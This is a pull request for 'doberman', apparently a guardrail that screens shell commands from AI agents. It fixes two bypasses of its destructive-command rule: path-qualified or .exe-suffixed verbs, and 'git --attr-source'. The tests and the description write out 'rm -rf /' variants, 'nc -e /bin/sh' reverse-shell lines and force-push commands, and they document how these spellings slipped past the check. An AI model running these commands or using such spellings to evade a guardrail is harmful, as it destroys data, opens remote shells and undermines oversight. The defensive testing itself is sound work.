### PR TITLE
fix(rules): canonicalise command verbs and close the git --attr-source walk

### DIFF
--- a/changelog.d/693.security.md
+++ b/changelog.d/693.security.md
@@ -1,0 +1,1 @@
+- Path-qualified or `.exe` spellings of destructive verbs and `git --attr-source <tree-ish>` no longer slip past the command scanner (#693)

--- a/src/doberman/engine/rules/commands.py
+++ b/src/doberman/engine/rules/commands.py
@@ -139,11 +139,21 @@ _GIT_FALSY_CONFIG_VALUES = {"false", "no", "off", "0"}
 #: (``-C <path>``, ``-c <k=v>``, and every long option below in its bare —
 #: i.e. no ``=`` — form) — both the option and its value token must be
 #: skipped when hunting for the actual subcommand. Verified against installed
-#: ``git 2.54.0.windows.1``: each of these accepts BOTH ``--opt <value>`` and
-#: ``--opt=<value>`` identically (issue #550 review — the space-separated
-#: form previously desynced the verb walk: ``/repo`` in
+#: ``git 2.54.0.windows.1``: ``--git-dir``/``--work-tree``/``--namespace``/
+#: ``--config-env``/``--attr-source`` genuinely accept BOTH
+#: ``--opt <value>`` and ``--opt=<value>`` (issue #550 review — the
+#: space-separated form previously desynced the verb walk: ``/repo`` in
 #: ``git --git-dir /repo push --force`` was read as the verb, so a real
-#: force-push silently PASSed). Every other long global option
+#: force-push silently PASSed; ``--attr-source`` had the identical gap, #690:
+#: ``HEAD`` in ``git --attr-source HEAD push --force`` was read as the verb).
+#: ``--exec-path`` and ``--super-prefix`` do NOT actually behave the same
+#: across the two forms — a bare ``--exec-path`` (no ``=``) takes no argument
+#: at all: real git prints its exec path and exits before running anything
+#: that follows, and ``--super-prefix`` no longer exists in git 2.54 — but
+#: both STAY in this set anyway (#690 review): raise-only forbids removing an
+#: entry that currently desyncs a (harmless-in-real-git, but currently
+#: BLOCKed/AUTHed here) spelling toward the correct verb; dropping either
+#: would flip that verdict to PASS instead. Every other long global option
 #: (``--no-pager``, ``--bare``, ...) either carries its value in the same
 #: token (``=``) or takes none at all (``--html-path``/``--man-path``/
 #: ``--info-path`` — confirmed these ignore any following token, ``=``-joined
@@ -158,6 +168,7 @@ _GIT_GLOBAL_OPTIONS_WITH_VALUE = {
     "--exec-path",
     "--super-prefix",
     "--config-env",
+    "--attr-source",
 }
 
 #: git commit short options that take a MANDATORY value — either as the rest
@@ -783,12 +794,24 @@ def _normalize_windows_backslashes(command: str) -> str:
     return command
 
 
+#: Windows executable suffixes stripped by :func:`_wrapper_name` — resolved
+#: case-insensitively (the token is lower-cased first), one at most.
+_EXECUTABLE_SUFFIXES = (".exe", ".cmd", ".bat", ".com")
+
+
 def _wrapper_name(token: str) -> str:
-    """Wrapper-recognition basename: strip a ``/`` or ``\\`` directory prefix
-    and a trailing ``.exe``, lower-cased — so ``/usr/bin/sudo`` and
-    ``SUDO.EXE`` are both recognized as ``sudo``."""
+    """Command-verb basename: strip a ``/`` or ``\\`` directory prefix and a
+    trailing Windows executable suffix (``.exe``/``.cmd``/``.bat``/``.com``),
+    lower-cased — so ``/usr/bin/sudo``, ``SUDO.EXE``, ``/bin/rm``, and
+    ``RM.EXE`` all resolve to their bare verb (``sudo``, ``rm``). Shared by
+    wrapper recognition (``argv_from_tokens``) and, #690, the destructive-
+    command verb comparisons in :func:`_segment_verdict` — one basename
+    helper so both always agree on what a path-qualified or `.exe`-suffixed
+    spelling actually is."""
     name = token.replace("\\", "/").rsplit("/", 1)[-1].lower()
-    return name.removesuffix(".exe")
+    for suffix in _EXECUTABLE_SUFFIXES:
+        name = name.removesuffix(suffix)
+    return name
 
 
 def _wrapper_opaque_option_ahead(tokens: list[str], name: str) -> bool:
@@ -1730,6 +1753,18 @@ def _segment_verdict(
     """Classify one parsed segment; ``None`` means this segment is benign."""
     if not tokens:
         return None
+    # #690: canonicalise the verb ONCE, here, and rebind `tokens` itself (not
+    # just `cmd`) — every downstream helper below keys off `tokens[0]`
+    # directly (`_git_leading_globals`, `_windows_delete_verdict`,
+    # `_raw_socket_exec_on_connect`, `_raw_socket_channel_explanation`,
+    # `_is_pipe_to_shell`, `_process_kill_verdict`), so a path-qualified
+    # (``/bin/rm``), `.exe`-suffixed (``rm.exe``, ``RM.EXE``), or
+    # wrapper-stripped (``sudo /bin/rm`` -> ``argv_from_tokens`` already
+    # popped ``sudo``, leaving ``/bin/rm`` here) spelling reaches every table
+    # exactly like the bare verb does. Uses the same basename helper
+    # ``argv_from_tokens`` already relies on for wrapper recognition — one
+    # choke point, not a second one.
+    tokens = [_wrapper_name(tokens[0]), *tokens[1:]]
     cmd = tokens[0]
 
     # --- Control-plane tamper → BLOCK (HK.5.0b) ---

--- a/tests/unit/test_git_verb_keyed_detectors.py
+++ b/tests/unit/test_git_verb_keyed_detectors.py
@@ -116,10 +116,17 @@ def test_chained_command_second_segment_force_push_still_blocks():
 # value-taking git global option must not desync the verb walk. Before the
 # fix, ``_GIT_GLOBAL_OPTIONS_WITH_VALUE`` only knew ``-C``/``-c`` consume a
 # separate next token, so ``--git-dir /repo push --force ...`` read ``/repo``
-# as the verb and PASSed a real force-push. Verified against installed git
-# 2.54: the space form and the ``=``-joined form behave identically for
-# ``--git-dir``/``--work-tree``/``--namespace``/``--exec-path``/
-# ``--config-env`` — real git accepts both.
+# as the verb and PASSed a real force-push (``--attr-source`` had the
+# identical gap, #690). Verified against installed git 2.54: the space form
+# and the ``=``-joined form genuinely behave identically for
+# ``--git-dir``/``--work-tree``/``--namespace``/``--config-env``/
+# ``--attr-source`` — real git accepts both. ``--exec-path`` does NOT — a
+# bare ``--exec-path`` takes no argument and exits before running anything
+# after it — but stays in the parametrize table below anyway: the test only
+# checks that our own token-skip stays desync-proof given a value-shaped
+# following token, not that real git treats the two forms alike (raise-only
+# forbids dropping the entry; see the ``_GIT_GLOBAL_OPTIONS_WITH_VALUE``
+# comment in ``commands.py``).
 
 
 @pytest.mark.parametrize(
@@ -130,6 +137,7 @@ def test_chained_command_second_segment_force_push_still_blocks():
         ("--namespace foo", "--namespace=foo"),
         ("--exec-path /x", "--exec-path=/x"),
         ("--config-env FOO=BAR", "--config-env=FOO=BAR"),
+        ("--attr-source HEAD", "--attr-source=HEAD"),
     ],
 )
 def test_space_separated_global_option_still_locates_force_push_verb(space_form, equal_form):

--- a/tests/unit/test_rule_commands.py
+++ b/tests/unit/test_rule_commands.py
@@ -13,6 +13,7 @@ from datetime import datetime, timezone
 import pytest
 
 from doberman import config
+from doberman.engine.objective import ObjectiveGuardrail
 from doberman.engine.rules import commands as commands_module
 from doberman.engine.rules.commands import (
     DestructiveCommandRule,
@@ -2019,3 +2020,119 @@ def test_substitution_nesting_is_depth_capped():
 
     shallow = "x=" + "$(" * 10 + "echo hi" + ")" * 10
     assert _cmd(shallow).verdict is Verdict.PASS
+
+
+# --- #690: path-qualified / .exe-suffixed / wrapped verb spellings must not --
+# bypass destructive-command detection. `_segment_verdict` compared `tokens[0]`
+# as an exact bare string, so `rm.exe`, `/bin/rm`, `RM.EXE`, or a
+# wrapper-stripped `sudo /bin/rm` never matched the `rm`/`git`/nc-like tables
+# even though they run the exact same binary as the bare spelling. The fix
+# canonicalises the verb (basename on `/` and `\`, case-insensitive
+# `.exe`/`.cmd`/`.bat`/`.com` suffix stripped) once at the top of
+# `_segment_verdict` and rebinds `tokens` itself, so every downstream check —
+# the git verb walk, the nc/ncat/socat exec-on-connect detector — sees the
+# canonical verb too, whether or not a wrapper (`sudo`, ...) ran first.
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        "rm -rf /",
+        "rm.exe -rf /",
+        "RM.EXE -rf /",
+        "/bin/rm -rf /",
+        "sudo /bin/rm -rf /",
+        "sudo rm.exe -rf /",
+        "C:\\Windows\\System32\\rm.exe -rf /",
+    ],
+)
+def test_path_qualified_or_exe_suffixed_rm_still_blocks(command):
+    result = _cmd(command)
+    assert result.verdict is Verdict.BLOCK
+    assert ReasonCode.destructive_command in result.reason_codes
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        "git push --force origin main",
+        "git.exe push --force origin main",
+        "/usr/bin/git push --force origin main",
+        "sudo git.exe push --force origin main",
+    ],
+)
+def test_path_qualified_or_exe_suffixed_git_force_push_still_blocks(command):
+    result = _cmd(command)
+    assert result.verdict is Verdict.BLOCK
+    assert ReasonCode.destructive_command in result.reason_codes
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        "nc -e /bin/sh 10.0.0.1 4444",
+        "/usr/bin/nc -e /bin/sh 10.0.0.1 4444",
+        "nc.exe -e cmd.exe 10.0.0.1 4444",
+        "sudo /usr/bin/nc -e /bin/sh 10.0.0.1 4444",
+    ],
+)
+def test_path_qualified_or_exe_suffixed_nc_exec_still_blocks(command):
+    result = _cmd(command)
+    assert result.verdict is Verdict.BLOCK
+    assert ReasonCode.raw_socket_channel in result.reason_codes
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        "rm -rf ./src",  # single in-repo delete under the bulk threshold, by design
+        "echo rm.exe",  # a mere argument, not the verb — never normalised
+    ],
+)
+def test_verb_canonicalisation_does_not_over_trigger(command):
+    assert _cmd(command).verdict is Verdict.PASS
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        "rm.exe -rf /",
+        "git.exe push --force origin main",
+    ],
+)
+def test_path_qualified_verb_bypass_blocks_through_full_objective_guardrail(command):
+    # Full pipeline (proxy normalize -> ObjectiveGuardrail), not just the rule
+    # in isolation — the probe path #690 was actually verified on.
+    action = normalize("Bash", {"command": command})
+    ctx = EvalContext(metadata={"repo_root": ".", "raw_arguments": {"command": command}})
+    result = ObjectiveGuardrail().evaluate(action, ctx)
+    assert result.verdict is Verdict.BLOCK
+    assert ReasonCode.destructive_command in result.reason_codes
+
+
+# --- #690: `git --attr-source <tree-ish>` was missing from ------------------
+# `_GIT_GLOBAL_OPTIONS_WITH_VALUE` and desynced the verb walk exactly the way
+# `--git-dir <path>` used to (#550): `HEAD` in
+# `git --attr-source HEAD push --force ...` was read as the verb, so the real
+# force-push silently PASSed. The `=`-joined form (`--attr-source=HEAD`) was
+# already a single self-contained token and was never affected.
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        "git --attr-source HEAD push --force origin main",
+        "git --attr-source=HEAD push --force origin main",
+    ],
+)
+def test_git_attr_source_global_option_still_locates_force_push_verb(command):
+    result = _cmd(command)
+    assert result.verdict is Verdict.BLOCK
+    assert ReasonCode.destructive_command in result.reason_codes
+
+
+def test_git_attr_source_global_option_still_locates_history_rewrite_verb():
+    bare = _cmd("git reset --hard HEAD~3")
+    with_global = _cmd("git --attr-source HEAD reset --hard HEAD~3")
+    assert with_global.verdict == bare.verdict == Verdict.AUTH
+    assert with_global.reason_codes == bare.reason_codes == [ReasonCode.destructive_command]


### PR DESCRIPTION
## What

Two bypasses of `DestructiveCommandRule` (`src/doberman/engine/rules/commands.py`):

1. `_segment_verdict` compared the command word as an exact bare string (`cmd = tokens[0]`), so a path-qualified or `.exe`/`.cmd`/`.bat`/`.com`-suffixed spelling of the same binary never matched the `rm`/`git`/nc-like tables even though it runs the identical program: `rm.exe -rf /`, `sudo /bin/rm -rf /`, `git.exe push --force origin main`, `/usr/bin/nc -e /bin/sh 10.0.0.1 4444` all PASSed while the bare spelling BLOCKed.
2. `_GIT_GLOBAL_OPTIONS_WITH_VALUE` was missing `--attr-source`, which real git 2.54 consumes as `--attr-source <tree-ish>`. The `_git_leading_globals` skip-walk therefore read the tree-ish as the git verb: `git --attr-source HEAD push --force origin main` and `git --attr-source HEAD reset --hard HEAD~3` PASSed a real force-push/history-rewrite.

## Fix (one choke point, raise-only)

- `_segment_verdict` now canonicalises `tokens[0]` once via `_wrapper_name` (the same basename helper `argv_from_tokens` already uses for wrapper recognition — extended to also strip `.cmd`/`.bat`/`.com`, not just `.exe`) and **rebinds `tokens` itself**, not just a local `cmd` variable — every downstream check that reads `tokens[0]` directly (the git verb walk, the nc/ncat/socat exec-on-connect detector, the Windows delete-verb table, `_is_pipe_to_shell`, `_process_kill_verdict`) sees the canonical verb too, whether or not a wrapper (`sudo`, ...) stripped first.
- Added `"--attr-source"` to `_GIT_GLOBAL_OPTIONS_WITH_VALUE`.
- `--exec-path`/`--super-prefix` are **not removed** even though the corrected comments now note they don't actually behave identically across the space/`=` forms in real git (a bare `--exec-path` takes no argument and exits; `--super-prefix` no longer exists in git 2.54) — raise-only forbids dropping an entry that currently desyncs a spelling toward the correct (BLOCK/AUTH) verdict; removing either would flip it to PASS instead.

## How it was verified

- Tests written first (RED), confirmed failing against the pre-fix tree, then made to pass (GREEN) by the fix above — no test was weakened.
- `PYTHONPATH=src python -m ruff check src tests` — clean.
- `PYTHONPATH=src python -m ruff format --check src tests` — clean.
- `PYTHONPATH=src lint-imports` — 5/5 contracts kept.
- `PYTHONPATH=src python -m pytest tests/unit -q` (serial, full 5306-test suite; `-n 4` OOMs on this box right now — pre-existing environment memory pressure, see below) — all green except two **pre-existing, diff-unrelated** failures reproduced in isolation on this branch:
  - `test_benchmark_agentdojo_live.py::test_subjective_eval_reports_all_suites_and_both_arms` — a numpy2/pandas/pyarrow binary-ABI mismatch importing the `agentdojo` benchmark suite (nothing to do with this rule).
  - `test_rule_dependency_admission.py::test_bounded_on_a_one_megabyte_command` — a transient `MemoryError` allocating a 1 MB string under system memory pressure; passes cleanly in isolation.

### Probe rows (rule level + one full pipeline test via `ObjectiveGuardrail`)

| Command | Before | After |
|---|---|---|
| `rm.exe -rf /`, `RM.EXE -rf /`, `/bin/rm -rf /`, `sudo /bin/rm -rf /`, `sudo rm.exe -rf /`, `C:\Windows\System32\rm.exe -rf /` | PASS | BLOCK `destructive_command` |
| `git.exe push --force origin main`, `/usr/bin/git push --force origin main`, `sudo git.exe push --force origin main` | PASS | BLOCK `destructive_command` |
| `/usr/bin/nc -e /bin/sh 10.0.0.1 4444`, `nc.exe -e cmd.exe 10.0.0.1 4444`, `sudo /usr/bin/nc -e /bin/sh 10.0.0.1 4444` | PASS | BLOCK `raw_socket_channel` |
| `git --attr-source HEAD push --force origin main` | PASS | BLOCK `destructive_command` |
| `git --attr-source HEAD reset --hard HEAD~3` | PASS | AUTH `destructive_command` (matches bare `git reset --hard HEAD~3`) |
| `rm -rf ./src`, `echo rm.exe` (negative controls) | PASS | PASS (unchanged) |

Full probe path: `doberman.proxy.normalize.normalize("Bash", {"command": cmd})` -> `doberman.engine.objective.ObjectiveGuardrail().evaluate(action, EvalContext(...))`.